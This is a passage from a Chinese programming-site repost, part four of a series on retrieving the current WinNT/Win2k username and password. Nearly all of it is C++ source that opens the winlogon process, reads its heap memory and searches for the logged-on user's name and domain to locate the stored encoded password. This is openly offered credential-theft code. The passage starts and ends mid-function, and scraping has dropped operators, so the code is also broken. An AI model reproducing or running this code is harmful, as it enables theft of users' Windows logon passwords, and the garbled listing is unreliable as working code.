获取WinNT/Win2k当前用户名和密码(4)
2008-02-23 05:38:12来源:互联网 阅读 ()
) !=0 )return (0);
if(strName.UpperCase().Pos("MSGINA") !=0 )
dwRc =QuerySystemInformationP->PID;
}
if(pvDebugBuffer)
pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer);
HeapFree(GetProcessHeap(), 0, pvInfo);
return (dwRc);
}
}
if (pvDebugBuffer)
pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer);
}
DWORD dwTemp = (DWORD)QuerySystemInformationP;
dwTemp = sizeof(QUERY_SYSTEM_INFORMATION);
QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION)dwTemp;
}
}
catch(...)
{}
HeapFree(GetProcessHeap(), 0, pvInfo);
return (dwRc);
}
//---------------------------------------------------------------------------
BOOL LocatePasswordPageWinNT(DWORD dwWinLogonPID, PDWORD pdwPwdLen)
{
#define USER_DOMAIN_OFFSET_WINNT 0x200
#define USER_PASSWORD_OFFSET_WINNT 0x400
BOOL bRc = FALSE;
HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
FALSE, dwWinLogonPID);
if(!hWinLogonHandle)
return (bRc);
*pdwPwdLen = 0;
SYSTEM_INFO siSystemInfo;
GetSystemInfo(&siSystemInfo);
DWORD dwPEB = 0x7ffdf000;
DWORD dwBytesCopied = 0;
PVOID pvEBP = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, siSystemInfo.dwPageSize);
if(!ReadProcessMemory(hWinLogonHandle, (PVOID)dwPEB, pvEBP,
siSystemInfo.dwPageSize, &dwBytesCopied))
{
CloseHandle(hWinLogonHandle);
return (bRc);
}
// Grab the value of the 2nd DWORD in the TEB.
PDWORD pdwWinLogonHeap = (PDWORD)((DWORD)pvEBP (6 * sizeof (DWORD)));
MEMORY_BASIC_INFORMATION mbiMemoryBasicInfor;
if(VirtualQueryEx(hWinLogonHandle, (PVOID) *pdwWinLogonHeap,
&mbiMemoryBasicInfor, sizeof(MEMORY_BASIC_INFORMATION)))
if(((mbiMemoryBasicInfor.State & MEM_COMMIT) == MEM_COMMIT) &&
((mbiMemoryBasicInfor.Protect & PAGE_GUARD) == 0))
{
PVOID pvWinLogonMem = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
mbiMemoryBasicInfor.RegionSize);
if(ReadProcessMemory(hWinLogonHandle, (PVOID)*pdwWinLogonHeap,
pvWinLogonMem, mbiMemoryBasicInfor.RegionSize, &dwBytesCopied))
{
DWORD i = (DWORD)pvWinLogonMem;
DWORD dwUserNamePos = 0;
// The order in memory is wszUserName followed by the wszUserDomain.
do
{
if((wcscmp(wszUserName, (wchar_t *)i) == 0) &&
(wcscmp(wszUserDomain, (wchar_t *)
(i USER_DOMAIN_OFFSET_WINNT)) == 0))
{
dwUserNamePos = i;
break;
}
i = 2;
}while(i < (DWORD)pvWinLogonMem mbiMemoryBasicInfor.RegionSize);
if(dwUserNamePos)
{
PENCODED_PASSWORD_INFO pepiEncodedPwdInfo =
(PENCODED_PASSWORD_INFO)((DWORD)dwUserNamePos
USER_PASSWORD_OFFSET_WINNT);
FILETIME ftLocalFileTime;
SYSTEMTIME stSystemTime;
if(FileTimeToLocalFileTime(&pepiEncodedPwdInfo->LoggedOn,
&ftLocalFileTime))
if(FileTimeToSystemTime(&ftLocalFileTime, &stSystemTime))
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
上一篇: 如何把一个网页存为一个单独的mht文档
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
